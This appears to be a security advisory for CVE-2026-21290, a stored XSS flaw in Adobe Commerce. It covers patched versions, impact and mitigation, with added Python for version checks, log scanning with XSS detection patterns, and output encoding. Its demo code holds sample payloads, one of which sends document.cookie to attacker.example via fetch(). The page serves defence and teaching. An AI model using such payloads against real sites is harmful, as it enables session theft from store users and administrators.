Platform
adobe
Component
adobe-commerce
Fixed in
2.4.5-p15
2.4.6-p13
2.4.7-p8
2.4.8-p3
2.4.9-alpha3
CVE-2026-21290 describes a stored Cross-Site Scripting (XSS) vulnerability in Adobe Commerce. A low-privileged attacker can inject script into vulnerable form fields; because the payload is stored server-side, it later executes in the browser of any other user who views the affected page, which can lead to session takeover and loss of data integrity. Affected are releases older than the fixed-in versions listed above (2.4.9-alpha3, 2.4.8-p3, 2.4.7-p8, 2.4.6-p13, 2.4.5-p15) as well as 2.4.4-p16 and earlier. Adobe has released patches that address the issue.
Successful exploitation of CVE-2026-21290 lets an attacker store arbitrary JavaScript in a vulnerable form field of Adobe Commerce. When another user loads a page that renders the stored value, for example an administrator reviewing submitted data, the script runs in that user's browser context with that user's session. This enables session hijacking (the attacker acts as the victim, which for an admin victim means control of the store), theft of data visible to the victim, defacement, or redirection to attacker-controlled sites. The high confidentiality and integrity impact in the CVSS rating reflects this potential for full account compromise and data manipulation.
CVE-2026-21290 was publicly disclosed on March 11, 2026. No active exploitation campaigns are known, and no public proof of concept has been confirmed. The vulnerability is not listed in the CISA KEV catalog at the time of writing. The CVSS base score of 8.7 rates severity, i.e. the impact if exploited, not the likelihood of exploitation; the EPSS estimate on this page (0.04%, 13th percentile) currently predicts a low probability. Stored XSS reachable from a low-privileged account is nonetheless simple to exploit once the injection point is known, so the patch should be treated as time-sensitive.
Organizations running affected Adobe Commerce releases (see the version list above) are at risk, in particular stores where low-privileged accounts can submit form data that other users, especially administrators, later view. Custom extensions or integrations that render user-supplied data without escaping widen the same exposure. Multi-tenant or shared-hosting setups in which several tenants use one Adobe Commerce instance are also exposed, since a payload stored by one tenant can execute in the sessions of users of another.
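To decide quickly whether an installed release is covered by the fixed-in list above, the following check can be used. It is an added example, not Adobe tooling: FIXED_IN copies only the "Fixed in" list on this page, the 2.4.4 line has no fixed release listed here and is therefore reported as unpatched (an assumption based on this page alone; consult the Adobe bulletin for that branch), and the ordering alphaN < betaN < GA release < pN within a branch is likewise an assumption.

```python
"""Check an Adobe Commerce version string against the fixed-in releases above.

Added example (not Adobe code). FIXED_IN mirrors the "Fixed in" list on this
page only. Versions are compared inside their branch (major.minor.patch):
alphaN < betaN < GA release < pN, with N compared numerically (assumption).
"""
import re

FIXED_IN = {
    "2.4.5": "2.4.5-p15",
    "2.4.6": "2.4.6-p13",
    "2.4.7": "2.4.7-p8",
    "2.4.8": "2.4.8-p3",
    "2.4.9": "2.4.9-alpha3",
    # 2.4.4: no fixed release listed on this page -> every 2.4.4 version is unpatched here
}

VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-(alpha|beta|p)(\d+))?$")
STAGE = {"alpha": 0, "beta": 1, "p": 2}   # GA release is stage 2 with n = 0


def parse_version(version: str):
    """Return (branch, rank); rank orders releases within one branch.

    Example ranks: 2.4.9-alpha3 -> (0, 3), 2.4.9 -> (2, 0), 2.4.9-p1 -> (2, 1).
    """
    m = VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised Adobe Commerce version: {version!r}")
    major, minor, patch, kind, n = m.groups()
    branch = f"{major}.{minor}.{patch}"
    rank = (STAGE[kind], int(n)) if kind else (STAGE["p"], 0)
    return branch, rank


def is_patched(version: str, fixed_in=FIXED_IN) -> bool:
    """True if version is at or beyond the fixed release of its branch."""
    branch, rank = parse_version(version)
    if branch not in fixed_in:
        return False  # no fix listed for this branch (covers 2.4.4-p16 and earlier)
    _, fixed_rank = parse_version(fixed_in[branch])
    return rank >= fixed_rank


if __name__ == "__main__":
    # Constructed sample inputs: the version component printed by `bin/magento --version`.
    for v in ["2.4.6-p12", "2.4.6-p13", "2.4.7-p9", "2.4.8", "2.4.9-alpha2", "2.4.4-p16"]:
        print(f"{v:12} {'patched' if is_patched(v) else 'UNPATCHED'}")
```

Feed it the version your deployment actually reports; a GA release such as 2.4.8 without a patch suffix is older than 2.4.8-p3 and is correctly flagged as unpatched.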
• filesystem:
grep -r "<script>" /var/www/html/app/code/Magento/*
(Legitimate templates also contain script tags, so this only surfaces gross tampering with core files; a stored-XSS payload lives in the database, not in app/code.)
• generic web:
curl -I https://your-magento-site.com/form-page | grep -i Content-Security-Policy
(Shows whether a CSP header is sent at all; the case-insensitive match is needed because curl prints HTTP/2 header names in lowercase. A Content-Security-Policy-Report-Only header, which this also matches, blocks nothing.)
• generic web:
Check access and error logs for suspicious POST requests containing <script> tags or other XSS payloads. Access logs normally record only the request line, so payloads submitted in a POST body must be reviewed in WAF or application logs.
• generic web:
Inspect form field input and output for unexpected HTML or JavaScript code.
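The log review above is easy to get wrong by grepping for a literal `<script>`: payloads arrive URL-encoded, sometimes double-encoded, and in mixed case. The scanner below is an added example (not part of this page or of Adobe Commerce) that decodes the request target before matching, reports query-string hits directly, and separately lists POSTs to form endpoints whose bodies are not in the access log. The log lines, addresses and the form-path prefixes are constructed for illustration.

```python
"""Scan web-server access logs for XSS indicators in request URLs.

Added example; the log lines are synthetic (not from a real deployment) and
the indicator list is illustrative, not exhaustive. Caveat: combined-format
access logs record only the request line, so a stored-XSS payload sent in a
POST body never appears here. Query-string hits are reported directly; POSTs
to form endpoints are reported so their bodies can be pulled from WAF or
application logs.
"""
import re
from urllib.parse import unquote_plus

# Apache/nginx "combined" format: client ident user [time] "request" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Matched case-insensitively against the *decoded* target, so %3Cscript, %3cSCRIPT
# and double-encoded forms are all caught.
XSS_INDICATORS = [
    ("script-tag", re.compile(r"<\s*script", re.I)),
    ("event-handler", re.compile(r"\bon[a-z]+\s*=", re.I)),
    ("javascript-uri", re.compile(r"javascript\s*:", re.I)),
    ("html-tag", re.compile(r"<\s*(img|svg|iframe|object|embed|body)\b", re.I)),
]


def fully_decode(text: str, rounds: int = 3) -> str:
    """URL-decode repeatedly so double-encoded payloads (%253C -> %3C -> <) are seen."""
    for _ in range(rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text


def scan_request_target(target: str):
    """Names of every XSS indicator found in the decoded request target."""
    decoded = fully_decode(target)
    return [name for name, rx in XSS_INDICATORS if rx.search(decoded)]


def scan_access_log(lines, form_paths=("/customer/account/", "/contact/", "/review/")):
    """Return one finding per suspicious line.

    kind "payload-in-url": indicator present in the decoded URL.
    kind "post-to-form":   POST to a form endpoint; body not logged, review elsewhere.
    form_paths is an assumed, illustrative list of store form URL prefixes.
    """
    findings = []
    for lineno, line in enumerate(lines, start=1):
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line; in production log it rather than skip silently
        hits = scan_request_target(m["target"])
        if hits:
            findings.append({"line": lineno, "ip": m["ip"], "kind": "payload-in-url",
                             "indicators": hits, "target": m["target"]})
        elif m["method"] == "POST" and m["target"].startswith(form_paths):
            findings.append({"line": lineno, "ip": m["ip"], "kind": "post-to-form",
                             "indicators": [], "target": m["target"]})
    return findings


# Constructed sample log (synthetic addresses, paths and timestamps).
SAMPLE_LOG = [
    '203.0.113.5 - - [11/Mar/2026:10:00:01 +0000] "GET /catalogsearch/result/?q=shoes HTTP/1.1" 200 5120',
    '203.0.113.5 - - [11/Mar/2026:10:00:07 +0000] "GET /catalogsearch/result/?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 4990',
    '198.51.100.9 - - [11/Mar/2026:10:01:13 +0000] "GET /review/product/list/?x=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E HTTP/1.1" 200 3001',
    '198.51.100.9 - - [11/Mar/2026:10:02:40 +0000] "POST /customer/account/editPost/ HTTP/1.1" 302 0',
    '192.0.2.44 - - [11/Mar/2026:10:03:02 +0000] "GET /static/version1/frontend/Magento/luma/en_US/js/bundle.js HTTP/1.1" 200 88000',
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['kind']} from {f['ip']} {f['indicators']} {f['target']}")
```

On the sample, line 2 is flagged for the encoded script tag, line 3 for the double-encoded image tag with an event handler, and line 4 as a POST to a form endpoint whose body needs review. Expect the event-handler pattern to produce some false positives on parameter names starting with "on"; treat the output as a triage list, not a verdict.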
Disclosure
Exploit status
EPSS
0.04% (13th percentile)
CISA SSVC
CVSS vector
The primary mitigation for CVE-2026-21290 is to upgrade to a patched version of Adobe Commerce; Adobe has released updates for each supported line (see the fixed-in list above). If immediate patching is not feasible, reduce exposure in the meantime: apply input validation and context-appropriate output encoding to user-supplied data in your own templates and extensions, and restrict which accounts can submit data that administrators later view. A Web Application Firewall with rules for common XSS payloads adds a layer of protection but can be bypassed with encoding variants. Check the Content Security Policy configuration as well: a policy delivered as Content-Security-Policy-Report-Only only reports and does not stop an injected script from running. Review and update security configurations regularly to keep the attack surface small.
Update Adobe Commerce to the latest available version. Further details and specific update instructions are given in the Adobe Security Bulletin.
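The mitigation advice above (input validation plus output encoding) and the exploitation description earlier both hinge on the same mechanism: a stored value placed into HTML without an encoder that fits the output context. The following is an added illustration in Python; it is not Adobe Commerce code (Magento templates use the framework's Escaper, e.g. escapeHtml, escapeHtmlAttr and escapeJs, for the same purpose). The attacker strings are constructed samples, and the page fragments are a minimal stand-in for a template.

```python
"""Context-aware output encoding for a stored form value (added example).

Three points are demonstrated with constructed attacker input:
  1. raw interpolation executes the stored script (the stored-XSS sink);
  2. HTML-escaping is not enough when the attribute is left unquoted;
  3. each output context (HTML text, quoted attribute, JS string) needs its own encoder.
Python stand-in for PHP template logic; not Magento code.
"""
import html
import json
import re

# Constructed stored values, e.g. a "display name" saved through a low-privilege account.
PAYLOAD_TAG = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
PAYLOAD_ATTR = "x onmouseover=alert(1)"            # no <, >, quotes: html.escape leaves it unchanged
PAYLOAD_JS = "</script><script>alert(1)</script>"  # tries to break out of a <script> block


def render_vulnerable(name: str) -> str:
    """Template that prints the stored value verbatim: the classic stored-XSS sink."""
    return f"<h1>Hello {name}</h1>"


def render_attr_unquoted(name: str) -> str:
    """Escaped but unquoted attribute: a space in the value starts a new attribute."""
    return f"<input value={html.escape(name, quote=True)}>"


def js_string(value: str) -> str:
    """Encode for a JS string literal inside <script>.

    json.dumps escapes quotes, backslashes and control characters; <, > and & are
    additionally written as \\uXXXX so the HTML parser never sees a tag (including a
    premature </script>) inside the literal, while JS decodes them back to the data.
    """
    return (json.dumps(value)
            .replace("<", "\\u003c")
            .replace(">", "\\u003e")
            .replace("&", "\\u0026"))


def render_hardened(name: str) -> str:
    """Same page with one encoder per output context."""
    text = html.escape(name, quote=True)      # HTML text and quoted attribute value
    return (
        f"<h1>Hello {text}</h1>"
        f'<input value="{text}">'
        f"<script>var displayName = {js_string(name)};</script>"
    )


def validate_display_name(name: str) -> bool:
    """Input validation for this field: word characters, space, dot, apostrophe, hyphen.

    Rejects markup outright, but a legitimate value such as O'Brien still carries a
    quote, which is why output encoding is required in addition, not instead.
    """
    return bool(re.fullmatch(r"[\w .'\-]{1,64}", name))


if __name__ == "__main__":
    print("vulnerable :", render_vulnerable(PAYLOAD_TAG))
    print("unquoted   :", render_attr_unquoted(PAYLOAD_ATTR))
    print("hardened   :", render_hardened(PAYLOAD_JS))
    print("validate   :", validate_display_name("O'Brien"), validate_display_name(PAYLOAD_ATTR))
```

In the hardened output the only `<script` in the document is the template's own; the attacker's tag appears as `&lt;script&gt;` in HTML contexts and as `\u003cscript\u003e` inside the JS literal. The unquoted-attribute case shows why "we escape everything" is not a complete answer: escaping changes nothing in `x onmouseover=alert(1)`, and only the quotes around the attribute keep it inert.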
CVE-2026-21290 is a stored Cross-Site Scripting (XSS) vulnerability in Adobe Commerce that lets a low-privileged attacker store malicious script in form fields so that it executes in other users' browsers.
If you are running an Adobe Commerce release older than the fixed-in versions listed above (2.4.9-alpha3, 2.4.8-p3, 2.4.7-p8, 2.4.6-p13, 2.4.5-p15), or 2.4.4-p16 or earlier, you are potentially affected.
Upgrade to a patched version of Adobe Commerce as specified in the official Adobe Security Bulletin. Until then, input validation, output encoding in your own templates and an enforced Content Security Policy reduce, but do not eliminate, the risk.
As of now there are no confirmed reports of active exploitation, but the vulnerability is reachable from a low-privileged account, so apply the patch promptly.
Refer to the official Adobe Security Bulletin for detailed information and patching instructions: [https://www.adobe.com/security/advisories/](https://www.adobe.com/security/advisories/)